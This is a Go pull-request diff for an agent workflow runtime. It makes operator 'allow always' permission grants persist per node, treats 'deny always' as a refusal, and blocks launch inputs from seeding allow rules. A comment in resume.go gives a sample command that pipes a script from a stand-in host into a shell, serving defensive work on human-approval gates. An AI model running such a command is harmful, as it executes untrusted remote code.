### PR TITLE
fix(permission): a grant lasted exactly one tool call

### DIFF
--- a/pkg/backend/model/executor_build_task.go
+++ b/pkg/backend/model/executor_build_task.go
@@ -689,7 +689,13 @@ func (e *ClawExecutor) buildTask(ctx context.Context, node ir.Node, f backendFie
 		// only the one it was answered on; the bare-string form is the
 		// older single-grant shape, still accepted so a checkpoint
 		// written by a previous build resumes without losing its grant.
+		// Two sources, two lifetimes: this pause's grant (whichever form
+		// the operator answered) and the run's accumulated `allow always`
+		// set. Both are additive to the freshly built policy.
 		for _, rule := range permission.GrantsFrom(input[permission.GrantInputKey]) {
+			pol.AddAllowRule(rule)
+		}
+		for _, rule := range permission.GrantsFrom(input[permission.RunGrantsInputKey]) {
 			pol.AddAllowRule(rule)
 		}
 		task.Permission = pol

--- a/pkg/backend/model/executor_build_task.go
+++ b/pkg/backend/model/executor_build_task.go
@@ -681,11 +681,16 @@ func (e *ClawExecutor) buildTask(ctx context.Context, node ir.Node, f backendFie
 	if pol, perr := e.resolvePermissionPolicy(f.permission); perr != nil {
 		return delegate.Task{}, fmt.Errorf("model: node %q: %w", f.id, perr)
 	} else if pol.Enabled() {
-		// On resume after a permission `ask` pause, the runtime computed
-		// the operator's grant rule and passed it via GrantInputKey; add it
-		// so the agent's re-issued call passes the gate.
-		if grant, ok := input[permission.GrantInputKey].(string); ok && grant != "" {
-			pol.AddAllowRule(grant)
+		// On resume after a permission `ask` pause, the runtime passes the
+		// grants the operator has earned so far via GrantInputKey; add
+		// them so the agent's re-issued call passes the gate. The slice
+		// form carries every grant of the run, which is what makes an
+		// `allow always` hold across a node's later pauses instead of
+		// only the one it was answered on; the bare-string form is the
+		// older single-grant shape, still accepted so a checkpoint
+		// written by a previous build resumes without losing its grant.
+		for _, rule := range permission.GrantsFrom(input[permission.GrantInputKey]) {
+			pol.AddAllowRule(rule)
 		}
 		task.Permission = pol
 	}

--- a/pkg/backend/model/executor_template.go
+++ b/pkg/backend/model/executor_template.go
@@ -557,7 +557,7 @@ func prependPriorAskUser(userText string, input map[string]any) string {
 	// The harness context is wrapped in <system-reminder> so the model reads
 	// it as injected state, cleanly separated from the user text it precedes;
 	// the bracket labels stay as stable transcript markers.
-	if len(permission.GrantsFrom(input[permission.GrantInputKey])) > 0 {
+	if grant, ok := input[permission.GrantInputKey].(string); ok && grant != "" {
 		return systemReminder(fmt.Sprintf("[PERMISSION GRANTED]\nThe operator approved your previous tool call (%s). It is now authorized — re-issue the exact same tool call now to perform it.", q)) + "\n\n" + userText
 	}
 	if isPermissionPrompt(q) {

--- a/pkg/backend/model/executor_template.go
+++ b/pkg/backend/model/executor_template.go
@@ -557,7 +557,7 @@ func prependPriorAskUser(userText string, input map[string]any) string {
 	// The harness context is wrapped in <system-reminder> so the model reads
 	// it as injected state, cleanly separated from the user text it precedes;
 	// the bracket labels stay as stable transcript markers.
-	if grant, ok := input[permission.GrantInputKey].(string); ok && grant != "" {
+	if len(permission.GrantsFrom(input[permission.GrantInputKey])) > 0 {
 		return systemReminder(fmt.Sprintf("[PERMISSION GRANTED]\nThe operator approved your previous tool call (%s). It is now authorized — re-issue the exact same tool call now to perform it.", q)) + "\n\n" + userText
 	}
 	if isPermissionPrompt(q) {

--- a/pkg/backend/permission/grants_from_test.go
+++ b/pkg/backend/permission/grants_from_test.go
@@ -70,3 +70,34 @@ func TestAccumulatedGrantsSurviveAPolicyRebuild(t *testing.T) {
 		t.Errorf("Edit = %v, want ask — accumulating grants must not grant what was never asked", d)
 	}
 }
+
+// "deny always" and "never" are the strongest refusals anyone typing
+// them means. Matching the `always` scope word before exhausting the
+// refusal tokens turned them into the strongest GRANT — and once grants
+// became durable, into a standing run-wide authorization for the tool.
+func TestParseAnswer_RefusalBeatsAlways(t *testing.T) {
+	for _, tc := range []struct {
+		answer string
+		allow  bool
+		always bool
+	}{
+		{"allow always", true, true},
+		{"ALWAYS", true, true},
+		{"deny always", false, false},
+		{"never", false, false},
+		{"never always", false, false},
+		{"reject always", false, false},
+		{"refuse always", false, false},
+		{"deny", false, false},
+		{"allow", true, false},
+		{"once", true, false},
+		{"oui", false, false},
+	} {
+		t.Run(tc.answer, func(t *testing.T) {
+			allow, always := ParseAnswer(tc.answer)
+			if allow != tc.allow || always != tc.always {
+				t.Errorf("ParseAnswer(%q) = (%v, %v), want (%v, %v)", tc.answer, allow, always, tc.allow, tc.always)
+			}
+		})
+	}
+}

--- a/pkg/backend/permission/grants_from_test.go
+++ b/pkg/backend/permission/grants_from_test.go
@@ -1,0 +1,72 @@
+package permission
+
+import (
+	"reflect"
+	"testing"
+)
+
+// The bare-string form is what a checkpoint written by a previous build
+// carries; the slice forms are the current accumulated set, before and
+// after a JSON round-trip through that checkpoint.
+func TestGrantsFrom(t *testing.T) {
+	for _, tc := range []struct {
+		name string
+		in   any
+		want []string
+	}{
+		{"legacy single grant", "Write", []string{"Write"}},
+		{"legacy empty", "", nil},
+		{"accumulated set", []string{"Write", "Bash(git add:*)"}, []string{"Write", "Bash(git add:*)"}},
+		{"after a JSON round-trip", []any{"Write", "Bash(git add:*)"}, []string{"Write", "Bash(git add:*)"}},
+		{"blanks dropped", []string{"Write", "", "Edit"}, []string{"Write", "Edit"}},
+		{"non-strings dropped", []any{"Write", 42, nil}, []string{"Write"}},
+		{"absent", nil, nil},
+		{"unexpected shape", map[string]any{"a": 1}, nil},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			got := GrantsFrom(tc.in)
+			if len(got) == 0 && len(tc.want) == 0 {
+				return
+			}
+			if !reflect.DeepEqual(got, tc.want) {
+				t.Errorf("GrantsFrom(%#v) = %#v, want %#v", tc.in, got, tc.want)
+			}
+		})
+	}
+}
+
+// The whole point of the accumulated set: a policy rebuilt from scratch
+// at the next pause still honours a grant earned at an earlier one.
+func TestAccumulatedGrantsSurviveAPolicyRebuild(t *testing.T) {
+	build := func(grants any) *Policy {
+		p, err := NewPolicy(ModeAsk, []string{"Read(**)", "Glob", "Grep"}, nil, nil)
+		if err != nil {
+			t.Fatalf("NewPolicy: %v", err)
+		}
+		for _, rule := range GrantsFrom(grants) {
+			p.AddAllowRule(rule)
+		}
+		return p
+	}
+
+	// Pause 1: the operator answers `allow always` on Write.
+	first := build([]string{"Write"})
+	if d, _ := first.Evaluate("Write", map[string]any{"file_path": "/wt/docs/x.md"}); d != Allow {
+		t.Fatalf("Write right after its own grant = %v, want allow", d)
+	}
+
+	// Pause 2 (a Bash commit): the run carries BOTH grants. Before the
+	// fix only the newest reached here, so Write went back to Ask and the
+	// operator re-authorized it on every document.
+	second := build([]string{"Write", "Bash(git add:*)"})
+	if d, _ := second.Evaluate("Write", map[string]any{"file_path": "/wt/docs/y.md"}); d != Allow {
+		t.Errorf("Write at a later pause = %v, want allow (the grant must outlive the pause it was earned on)", d)
+	}
+	if d, _ := second.Evaluate("Bash", map[string]any{"command": "git add docs/y.md"}); d != Allow {
+		t.Errorf("Bash at its own pause = %v, want allow", d)
+	}
+	// Nothing else widened.
+	if d, _ := second.Evaluate("Edit", map[string]any{"file_path": "/wt/docs/y.md"}); d != Ask {
+		t.Errorf("Edit = %v, want ask — accumulating grants must not grant what was never asked", d)
+	}
+}

--- a/pkg/backend/permission/marker.go
+++ b/pkg/backend/permission/marker.go
@@ -62,3 +62,40 @@ func GrantFromAnswer(answer, tool string, input map[string]any) (rule string, ap
 	}
 	return GrantRuleFor(tool, input, always), true
 }
+
+// GrantsFrom normalizes whatever the runtime put under GrantInputKey
+// into the list of allow rules it stands for.
+//
+// Three shapes reach here. A []string is the current form: every grant
+// the run has earned, so an `allow always` answered at one pause still
+// holds at the next. A bare string is the older single-grant form, kept
+// so a checkpoint written by a previous build resumes with its grant
+// intact. A []any is the same slice after a JSON round-trip through the
+// checkpoint. Anything else, including a nil entry, yields no rules.
+func GrantsFrom(v any) []string {
+	switch grant := v.(type) {
+	case string:
+		if grant == "" {
+			return nil
+		}
+		return []string{grant}
+	case []string:
+		out := make([]string, 0, len(grant))
+		for _, rule := range grant {
+			if rule != "" {
+				out = append(out, rule)
+			}
+		}
+		return out
+	case []any:
+		out := make([]string, 0, len(grant))
+		for _, raw := range grant {
+			if rule, ok := raw.(string); ok && rule != "" {
+				out = append(out, rule)
+			}
+		}
+		return out
+	default:
+		return nil
+	}
+}

--- a/pkg/backend/permission/marker.go
+++ b/pkg/backend/permission/marker.go
@@ -21,6 +21,15 @@ const (
 	// resume with the computed grant rule; the executor reads it and adds
 	// it to the resolved policy.
 	GrantInputKey = "_permission_grant"
+	// RunGrantsInputKey is the reserved node-input key carrying every
+	// `allow always` rule the run has accumulated. Kept distinct from
+	// GrantInputKey because the two answer forms differ in LIFETIME, not
+	// only in scope: `allow` authorizes the one call the operator was
+	// shown, `allow always` holds for the rest of the run. Distinct also
+	// because GrantInputKey's presence is what tells the resume framing
+	// that THIS pause was approved — a run-wide set under that key would
+	// announce "[PERMISSION GRANTED]" on a pause the operator just denied.
+	RunGrantsInputKey = "_permission_run_grants"
 )
 
 // Marker builds the structured permission-request payload stored in the

--- a/pkg/backend/permission/messages.go
+++ b/pkg/backend/permission/messages.go
@@ -60,6 +60,15 @@ func ParseAnswer(s string) (allow bool, always bool) {
 	switch {
 	case t == "deny" || t == "no" || t == "reject" || t == "n":
 		return false, false
+	// A refusal anywhere in the reply wins over the `always` scope word.
+	// "deny always" and "never" read as the STRONGEST refusal to anyone
+	// typing them; matching `always` first turned them into the
+	// strongest grant instead. Free text really does reach here — the
+	// prompt invites it, and --answers-file / the API accept anything;
+	// only the studio offers fixed buttons.
+	case strings.Contains(t, "deny") || strings.Contains(t, "never") ||
+		strings.Contains(t, "reject") || strings.Contains(t, "refus"):
+		return false, false
 	case strings.Contains(t, "always"):
 		return true, true
 	case t == "allow" || t == "yes" || t == "y" || t == "approve" || t == "ok" || t == "once":

--- a/pkg/runtime/engine.go
+++ b/pkg/runtime/engine.go
@@ -255,6 +255,14 @@ type runState struct {
 	// Written only by the execution-loop goroutine (applyOverride) and
 	// re-seeded at resume from Run.LoopOverrides. nil until first bump.
 	loopOverrides map[string]int
+	// permissionGrants accumulates the allow rules earned by answering a
+	// permission-gate pause, in the order they were granted. Every pause
+	// is resumed by a fresh engine with a fresh runState, so a grant that
+	// lived only in the node input reached exactly ONE re-invocation and
+	// then vanished — the operator re-authorized the same tool at every
+	// pause while the runtime told them it had been added "for the rest
+	// of this run". Re-seeded at resume from Run.PermissionGrants.
+	permissionGrants []string
 	// loopPreviousOutput holds the snapshot of the source node output from
 	// the PREVIOUS traversal of a given loop's edge — i.e., one iteration
 	// behind the current one. Workflows reference it as

--- a/pkg/runtime/engine.go
+++ b/pkg/runtime/engine.go
@@ -255,14 +255,18 @@ type runState struct {
 	// Written only by the execution-loop goroutine (applyOverride) and
 	// re-seeded at resume from Run.LoopOverrides. nil until first bump.
 	loopOverrides map[string]int
-	// permissionGrants accumulates the allow rules earned by answering a
-	// permission-gate pause, in the order they were granted. Every pause
-	// is resumed by a fresh engine with a fresh runState, so a grant that
-	// lived only in the node input reached exactly ONE re-invocation and
-	// then vanished — the operator re-authorized the same tool at every
-	// pause while the runtime told them it had been added "for the rest
-	// of this run". Re-seeded at resume from Run.PermissionGrants.
-	permissionGrants []string
+	// permissionGrants accumulates the `allow always` rules earned at a
+	// permission-gate pause, keyed by the node that earned them and
+	// ordered by grant. Every pause is resumed by a fresh engine with a
+	// fresh runState, so a grant that lived only in the node input
+	// reached exactly ONE re-invocation and then vanished — the operator
+	// re-authorized the same tool at every pause while the runtime told
+	// them it had been added "for the rest of this run". Re-seeded at
+	// resume from Run.PermissionGrants. Per node, never run-wide: an
+	// allow rule outranks the mode default, so a shared set would let an
+	// approval on a permissive node unlock one that declared
+	// `permission: deny`.
+	permissionGrants map[string][]string
 	// loopPreviousOutput holds the snapshot of the source node output from
 	// the PREVIOUS traversal of a given loop's edge — i.e., one iteration
 	// behind the current one. Workflows reference it as

--- a/pkg/runtime/engine_resolve.go
+++ b/pkg/runtime/engine_resolve.go
@@ -14,6 +14,7 @@ import (
 	"time"
 
 	"github.com/SocialGouv/iterion/pkg/backend/model"
+	"github.com/SocialGouv/iterion/pkg/backend/permission"
 	"github.com/SocialGouv/iterion/pkg/dsl/ir"
 	"github.com/SocialGouv/iterion/pkg/memory"
 	"github.com/SocialGouv/iterion/pkg/store"
@@ -141,17 +142,13 @@ func (e *Engine) buildNodeInputRS(nodeID string, sc resolveScope) map[string]any
 		}
 	}
 
-	if len(result) > 0 {
-		return result
-	}
-
 	// Fallback: for the entry node merge workflow var defaults with run-level
 	// inputs so that {{input.X}} references resolve to the var default when
 	// --var X=... was not provided on the CLI. Without this, vars declared
 	// with a default like `scope_notes: string = ""` are missing from the
 	// entry node's input map and the placeholder is left literal in prompts.
 	// CLI inputs override defaults.
-	if nodeID == e.workflow.Entry {
+	if len(result) == 0 && nodeID == e.workflow.Entry {
 		for name, v := range e.workflow.Vars {
 			if v.HasDefault {
 				result[name] = v.Default
@@ -160,6 +157,24 @@ func (e *Engine) buildNodeInputRS(nodeID string, sc resolveScope) map[string]any
 		for k, v := range sc.runInputs {
 			result[k] = v
 		}
+	}
+
+	// The reserved permission keys are engine-owned. Run inputs are
+	// caller-supplied and land wholesale on the entry node above, so a
+	// launch payload naming them would otherwise seed policy allow rules
+	// straight into the gate that exists to bound the caller.
+	delete(result, permission.GrantInputKey)
+	delete(result, permission.RunGrantsInputKey)
+	// Attach the grants this node has earned. Done here rather than only
+	// on the resume path so an ordinary execution and a bounded-loop
+	// re-entry carry them too — a re-entry is a fresh Execute, not a
+	// re-invocation, and without this the operator re-authorizes the same
+	// tool every time a repair loop re-enters the node. Per node on
+	// purpose: Evaluate ranks allow rules above the mode default, so
+	// lending one node's grant to another would beat a `permission: deny`
+	// the other node declared for itself.
+	if sc.rs != nil && len(sc.rs.permissionGrants[nodeID]) > 0 {
+		result[permission.RunGrantsInputKey] = append([]string(nil), sc.rs.permissionGrants[nodeID]...)
 	}
 
 	return result

--- a/pkg/runtime/override.go
+++ b/pkg/runtime/override.go
@@ -4,6 +4,7 @@ import (
 	"context"
 	"errors"
 	"fmt"
+	"slices"
 	"sort"
 	"time"
 
@@ -307,6 +308,9 @@ func (e *Engine) applySteeringState(rs *runState, r *store.Run) {
 			rs.loopOverrides[k] = v
 		}
 	}
+	if len(r.PermissionGrants) > 0 {
+		rs.permissionGrants = append([]string(nil), r.PermissionGrants...)
+	}
 	if r.BudgetRaises != nil && rs.budget != nil {
 		rs.budget.RaiseCaps(ir.BudgetOverrides{
 			MaxCostUSD:    r.BudgetRaises.MaxCostUSD,
@@ -332,4 +336,27 @@ func appliedBudgetFields(o ir.BudgetOverrides) map[string]any {
 		m["max_duration"] = o.MaxDuration
 	}
 	return m
+}
+
+// recordPermissionGrant appends a newly earned permission allow rule to
+// the run's accumulated set and persists it, so the next resume — which
+// builds a fresh engine and a fresh runState — still carries it. No-ops
+// on a duplicate so a repeated `allow always` on the same tool does not
+// grow the stored slice. A persistence failure is logged, never fatal:
+// the grant still holds for the current re-invocation, and the worst
+// case is the operator being asked once more.
+func (e *Engine) recordPermissionGrant(rs *runState, rule string) {
+	if rs == nil || rule == "" {
+		return
+	}
+	if slices.Contains(rs.permissionGrants, rule) {
+		return
+	}
+	rs.permissionGrants = append(rs.permissionGrants, rule)
+	if e.store == nil {
+		return
+	}
+	if err := e.store.PatchRunPermissionGrants(rs.ctx, rs.runID, rs.permissionGrants); err != nil {
+		e.logger.Warn("runtime: persist permission grant %q: %v", rule, err)
+	}
 }

--- a/pkg/runtime/override.go
+++ b/pkg/runtime/override.go
@@ -309,7 +309,10 @@ func (e *Engine) applySteeringState(rs *runState, r *store.Run) {
 		}
 	}
 	if len(r.PermissionGrants) > 0 {
-		rs.permissionGrants = append([]string(nil), r.PermissionGrants...)
+		rs.permissionGrants = make(map[string][]string, len(r.PermissionGrants))
+		for node, rules := range r.PermissionGrants {
+			rs.permissionGrants[node] = append([]string(nil), rules...)
+		}
 	}
 	if r.BudgetRaises != nil && rs.budget != nil {
 		rs.budget.RaiseCaps(ir.BudgetOverrides{
@@ -345,14 +348,17 @@ func appliedBudgetFields(o ir.BudgetOverrides) map[string]any {
 // grow the stored slice. A persistence failure is logged, never fatal:
 // the grant still holds for the current re-invocation, and the worst
 // case is the operator being asked once more.
-func (e *Engine) recordPermissionGrant(rs *runState, rule string) {
-	if rs == nil || rule == "" {
+func (e *Engine) recordPermissionGrant(rs *runState, nodeID, rule string) {
+	if rs == nil || nodeID == "" || rule == "" {
 		return
 	}
-	if slices.Contains(rs.permissionGrants, rule) {
+	if slices.Contains(rs.permissionGrants[nodeID], rule) {
 		return
 	}
-	rs.permissionGrants = append(rs.permissionGrants, rule)
+	if rs.permissionGrants == nil {
+		rs.permissionGrants = make(map[string][]string, 1)
+	}
+	rs.permissionGrants[nodeID] = append(rs.permissionGrants[nodeID], rule)
 	if e.store == nil {
 		return
 	}

--- a/pkg/runtime/permission_grants_test.go
+++ b/pkg/runtime/permission_grants_test.go
@@ -23,12 +23,13 @@ func TestPermissionGrants_AccumulatePersistAndReseed(t *testing.T) {
 	rs := eng.newRunState("r-grants", nil)
 	rs.ctx = ctx
 
-	eng.recordPermissionGrant(rs, "Write")
-	eng.recordPermissionGrant(rs, "Bash(git add:*)")
-	eng.recordPermissionGrant(rs, "Write") // same answer twice: no growth
-	eng.recordPermissionGrant(rs, "")      // nothing to record
+	eng.recordPermissionGrant(rs, "writer", "Write")
+	eng.recordPermissionGrant(rs, "writer", "Bash(git add:*)")
+	eng.recordPermissionGrant(rs, "writer", "Write") // same answer twice: no growth
+	eng.recordPermissionGrant(rs, "writer", "")      // nothing to record
+	eng.recordPermissionGrant(rs, "", "Write")       // no node, no record
 
-	want := []string{"Write", "Bash(git add:*)"}
+	want := map[string][]string{"writer": {"Write", "Bash(git add:*)"}}
 	if !reflect.DeepEqual(rs.permissionGrants, want) {
 		t.Fatalf("in-memory grants = %#v, want %#v", rs.permissionGrants, want)
 	}
@@ -51,8 +52,8 @@ func TestPermissionGrants_AccumulatePersistAndReseed(t *testing.T) {
 		t.Errorf("re-seeded grants = %#v, want %#v", fresh.permissionGrants, want)
 	}
 	// Re-seeding must copy, not alias the store's slice.
-	fresh.permissionGrants[0] = "mutated"
-	if r.PermissionGrants[0] != "Write" {
+	fresh.permissionGrants["writer"][0] = "mutated"
+	if r.PermissionGrants["writer"][0] != "Write" {
 		t.Error("applySteeringState aliased the run record's slice")
 	}
 }
@@ -96,5 +97,56 @@ func TestPermissionGrants_BothInputKeysDecode(t *testing.T) {
 	}
 	if got := permission.GrantsFrom(nil); len(got) != 0 {
 		t.Errorf("an absent key decoded to %#v, want nothing", got)
+	}
+}
+
+// A grant belongs to the node that earned it. Evaluate ranks allow rules
+// above the mode default, so lending one node's grant to another would
+// beat a `permission: deny` that other node declared for itself — an
+// approval given on a permissive implementer silently unlocking a strict
+// reviewer.
+func TestPermissionGrants_DoNotLeakToAnotherNode(t *testing.T) {
+	ctx := context.Background()
+	wf := loopWorkflow(2)
+	s := tmpStore(t)
+	if _, err := s.CreateRun(ctx, "r-scope", "wf", nil); err != nil {
+		t.Fatalf("CreateRun: %v", err)
+	}
+	eng := New(wf, s, newStubExecutor())
+	rs := eng.newRunState("r-scope", nil)
+	rs.ctx = ctx
+	eng.recordPermissionGrant(rs, "writer", "Bash")
+
+	granted := eng.buildNodeInputRS("writer", rs.scope())
+	if got := permission.GrantsFrom(granted[permission.RunGrantsInputKey]); len(got) != 1 {
+		t.Errorf("the granting node carries %#v, want its own grant", got)
+	}
+	strict := eng.buildNodeInputRS("reviewer", rs.scope())
+	if got := permission.GrantsFrom(strict[permission.RunGrantsInputKey]); len(got) != 0 {
+		t.Errorf("a different node carries %#v, want nothing", got)
+	}
+}
+
+// Run inputs are caller-supplied and land wholesale on the entry node, so
+// a launch payload naming the reserved keys would otherwise seed policy
+// allow rules straight into the gate meant to bound that caller.
+func TestPermissionGrants_LaunchInputsCannotSeedRules(t *testing.T) {
+	wf := loopWorkflow(2)
+	eng := New(wf, tmpStore(t), newStubExecutor())
+	rs := eng.newRunState("r-inject", map[string]any{
+		permission.GrantInputKey:     "Bash",
+		permission.RunGrantsInputKey: []string{"Bash", "Write"},
+		"legit":                      "kept",
+	})
+
+	in := eng.buildNodeInputRS(wf.Entry, rs.scope())
+	if _, present := in[permission.GrantInputKey]; present {
+		t.Error("a launch input seeded this-pause grant onto the entry node")
+	}
+	if _, present := in[permission.RunGrantsInputKey]; present {
+		t.Error("a launch input seeded run grants onto the entry node")
+	}
+	if in["legit"] != "kept" {
+		t.Errorf("ordinary launch inputs were dropped: %#v", in)
 	}
 }

--- a/pkg/runtime/permission_grants_test.go
+++ b/pkg/runtime/permission_grants_test.go
@@ -1,0 +1,100 @@
+package runtime
+
+import (
+	"context"
+	"reflect"
+	"testing"
+
+	"github.com/SocialGouv/iterion/pkg/backend/permission"
+)
+
+// The defect this covers: a grant lived only in the node input of the
+// re-invocation it was answered on, so the next pause — resumed by a
+// fresh engine with a fresh runState — no longer had it, and the
+// operator re-authorized the same tool for every mutation.
+func TestPermissionGrants_AccumulatePersistAndReseed(t *testing.T) {
+	ctx := context.Background()
+	wf := loopWorkflow(2)
+	s := tmpStore(t)
+	if _, err := s.CreateRun(ctx, "r-grants", "wf", nil); err != nil {
+		t.Fatalf("CreateRun: %v", err)
+	}
+	eng := New(wf, s, newStubExecutor())
+	rs := eng.newRunState("r-grants", nil)
+	rs.ctx = ctx
+
+	eng.recordPermissionGrant(rs, "Write")
+	eng.recordPermissionGrant(rs, "Bash(git add:*)")
+	eng.recordPermissionGrant(rs, "Write") // same answer twice: no growth
+	eng.recordPermissionGrant(rs, "")      // nothing to record
+
+	want := []string{"Write", "Bash(git add:*)"}
+	if !reflect.DeepEqual(rs.permissionGrants, want) {
+		t.Fatalf("in-memory grants = %#v, want %#v", rs.permissionGrants, want)
+	}
+
+	r, err := s.LoadRun(ctx, "r-grants")
+	if err != nil {
+		t.Fatalf("LoadRun: %v", err)
+	}
+	if !reflect.DeepEqual(r.PermissionGrants, want) {
+		t.Fatalf("persisted grants = %#v, want %#v", r.PermissionGrants, want)
+	}
+
+	// The resume: a brand-new runState, re-seeded from the run record.
+	fresh := eng.newRunState("r-grants", nil)
+	if len(fresh.permissionGrants) != 0 {
+		t.Fatalf("a fresh runState already holds grants: %#v", fresh.permissionGrants)
+	}
+	eng.applySteeringState(fresh, r)
+	if !reflect.DeepEqual(fresh.permissionGrants, want) {
+		t.Errorf("re-seeded grants = %#v, want %#v", fresh.permissionGrants, want)
+	}
+	// Re-seeding must copy, not alias the store's slice.
+	fresh.permissionGrants[0] = "mutated"
+	if r.PermissionGrants[0] != "Write" {
+		t.Error("applySteeringState aliased the run record's slice")
+	}
+}
+
+// `allow` and `allow always` differ in LIFETIME, not only in scope. Only
+// the always form may join the run set; recording the once form would
+// turn a single approved argument-scoped rule into standing
+// authorization for the rest of the run.
+func TestPermissionGrants_OnlyAlwaysIsRecorded(t *testing.T) {
+	for _, tc := range []struct {
+		answer   string
+		recorded bool
+	}{
+		{"allow always", true},
+		{"allow", false},
+		{"once", false},
+		{"deny", false},
+		{"oui", false}, // unparseable: read as a refusal
+	} {
+		t.Run(tc.answer, func(t *testing.T) {
+			allow, always := permission.ParseAnswer(tc.answer)
+			rule, approved := permission.GrantFromAnswer(tc.answer, "Bash", map[string]any{"command": "rm -rf build/*"})
+			if approved != allow {
+				t.Fatalf("GrantFromAnswer approved=%v but ParseAnswer allow=%v", approved, allow)
+			}
+			if got := approved && always; got != tc.recorded {
+				t.Errorf("answer %q would be recorded run-wide = %v, want %v (rule %q)", tc.answer, got, tc.recorded, rule)
+			}
+		})
+	}
+}
+
+// Both node-input keys must be honoured by the executor contract, and
+// they carry different things: the pause's own grant, and the run set.
+func TestPermissionGrants_BothInputKeysDecode(t *testing.T) {
+	if got := permission.GrantsFrom("Bash(rm -rf build/*)"); len(got) != 1 {
+		t.Errorf("this pause's grant decoded to %#v, want one rule", got)
+	}
+	if got := permission.GrantsFrom([]string{"Write", "Bash(git add:*)"}); len(got) != 2 {
+		t.Errorf("the run set decoded to %#v, want two rules", got)
+	}
+	if got := permission.GrantsFrom(nil); len(got) != 0 {
+		t.Errorf("an absent key decoded to %#v, want nothing", got)
+	}
+}

--- a/pkg/runtime/resume.go
+++ b/pkg/runtime/resume.go
@@ -1275,9 +1275,17 @@ func (e *Engine) reInvokeBackend(ctx context.Context, rs *runState, nodeID strin
 		if tool, input, _, ok := permission.ParseMarker(marker); ok {
 			answer, _ := answers[delegate.AskUserQuestionKey].(string)
 			if rule, approved := permission.GrantFromAnswer(answer, tool, input); approved {
-				nodeInput[permission.GrantInputKey] = rule
+				e.recordPermissionGrant(rs, rule)
 			}
 		}
+	}
+	// Carry EVERY grant earned so far, not just this pause's. A node that
+	// pauses once per mutation (a writer committing one document at a
+	// time) otherwise re-asks for the same tool on every single pause,
+	// because each resume rebuilds the node input from the edges and the
+	// previous grant is not in it.
+	if len(rs.permissionGrants) > 0 {
+		nodeInput[permission.GrantInputKey] = append([]string(nil), rs.permissionGrants...)
 	}
 
 	// When the backend captured the LLM's conversation at the pause point

--- a/pkg/runtime/resume.go
+++ b/pkg/runtime/resume.go
@@ -1283,7 +1283,7 @@ func (e *Engine) reInvokeBackend(ctx context.Context, rs *runState, nodeID strin
 			answer, _ := answers[delegate.AskUserQuestionKey].(string)
 			if rule, approved := permission.GrantFromAnswer(answer, tool, input); approved {
 				if _, always := permission.ParseAnswer(answer); always {
-					e.recordPermissionGrant(rs, rule)
+					e.recordPermissionGrant(rs, nodeID, rule)
 				}
 				// GrantInputKey keeps its original meaning: THIS pause was
 				// approved. The resume framing reads it to tell the model
@@ -1293,14 +1293,9 @@ func (e *Engine) reInvokeBackend(ctx context.Context, rs *runState, nodeID strin
 			}
 		}
 	}
-	// The accumulated `always` set travels separately, on every
-	// re-invocation. A node that pauses once per mutation (a writer
-	// committing one document at a time) otherwise re-asks for the same
-	// tool at every pause, because each resume rebuilds the node input
-	// from the edges and the previous grant is not in it.
-	if len(rs.permissionGrants) > 0 {
-		nodeInput[permission.RunGrantsInputKey] = append([]string(nil), rs.permissionGrants...)
-	}
+	// The node's accumulated `always` set is attached by
+	// buildNodeInputRS above, so it also reaches an ordinary execution
+	// and a loop re-entry — not just this re-invocation.
 
 	// When the backend captured the LLM's conversation at the pause point
 	// (claw), relay it through the executor so the Task carries

--- a/pkg/runtime/resume.go
+++ b/pkg/runtime/resume.go
@@ -1271,21 +1271,35 @@ func (e *Engine) reInvokeBackend(ctx context.Context, rs *runState, nodeID strin
 	// rule here (backend-agnostic) and pass it via GrantInputKey so the
 	// executor adds it to the resolved policy — the agent's re-issued call
 	// then passes the gate on both backends.
+	// Only `allow always` joins the run's accumulated set. The `once`
+	// form authorizes the single call the operator was shown — that is
+	// exactly what the pause prompt promises, and the rule it produces is
+	// argument-scoped, so persisting it would turn one approved
+	// `Bash(rm -rf build/*)` into a standing rule that also matches
+	// `rm -rf build/x && curl evil.sh | sh` for the rest of the run.
+	// The once-grant therefore rides THIS re-invocation and no further.
 	if marker, ok := ni.Questions[permission.InteractionMarkerKey]; ok {
 		if tool, input, _, ok := permission.ParseMarker(marker); ok {
 			answer, _ := answers[delegate.AskUserQuestionKey].(string)
 			if rule, approved := permission.GrantFromAnswer(answer, tool, input); approved {
-				e.recordPermissionGrant(rs, rule)
+				if _, always := permission.ParseAnswer(answer); always {
+					e.recordPermissionGrant(rs, rule)
+				}
+				// GrantInputKey keeps its original meaning: THIS pause was
+				// approved. The resume framing reads it to tell the model
+				// its call is now authorized, so it must stay empty on a
+				// denial even when the run holds earlier grants.
+				nodeInput[permission.GrantInputKey] = rule
 			}
 		}
 	}
-	// Carry EVERY grant earned so far, not just this pause's. A node that
-	// pauses once per mutation (a writer committing one document at a
-	// time) otherwise re-asks for the same tool on every single pause,
-	// because each resume rebuilds the node input from the edges and the
-	// previous grant is not in it.
+	// The accumulated `always` set travels separately, on every
+	// re-invocation. A node that pauses once per mutation (a writer
+	// committing one document at a time) otherwise re-asks for the same
+	// tool at every pause, because each resume rebuilds the node input
+	// from the edges and the previous grant is not in it.
 	if len(rs.permissionGrants) > 0 {
-		nodeInput[permission.GrantInputKey] = append([]string(nil), rs.permissionGrants...)
+		nodeInput[permission.RunGrantsInputKey] = append([]string(nil), rs.permissionGrants...)
 	}
 
 	// When the backend captured the LLM's conversation at the pause point

--- a/pkg/store/iface.go
+++ b/pkg/store/iface.go
@@ -74,14 +74,14 @@ type RunStore interface {
 	// right after applying an override in memory.
 	PatchRunSteering(ctx context.Context, runID string, loopOverrides map[string]int, budgetRaises *RunBudgetRaises) error
 
-	// PatchRunPermissionGrants persists the allow rules earned at
-	// permission-gate pauses so a later resume — which builds a fresh
-	// engine and a fresh runState — still carries them. Replaces the
-	// stored slice wholesale with the caller's accumulated set; a nil
-	// slice leaves it untouched. Kept separate from PatchRunSteering
-	// because a grant is an authorization the operator granted, not a
-	// steering knob an operator turned.
-	PatchRunPermissionGrants(ctx context.Context, runID string, grants []string) error
+	// PatchRunPermissionGrants persists the `allow always` rules earned
+	// at permission-gate pauses, keyed by the node that earned them, so a
+	// later resume — which builds a fresh engine and a fresh runState —
+	// still carries them. Replaces the stored map wholesale with the
+	// caller's accumulated set; a nil map leaves it untouched. Kept
+	// separate from PatchRunSteering because a grant is an authorization
+	// the operator gave, not a steering knob an operator turned.
+	PatchRunPermissionGrants(ctx context.Context, runID string, grants map[string][]string) error
 
 	// PruneDeletionMarkers reaps the durable tombstones DeleteRun
 	// leaves behind (the resurrection guard) once they are older than

--- a/pkg/store/iface.go
+++ b/pkg/store/iface.go
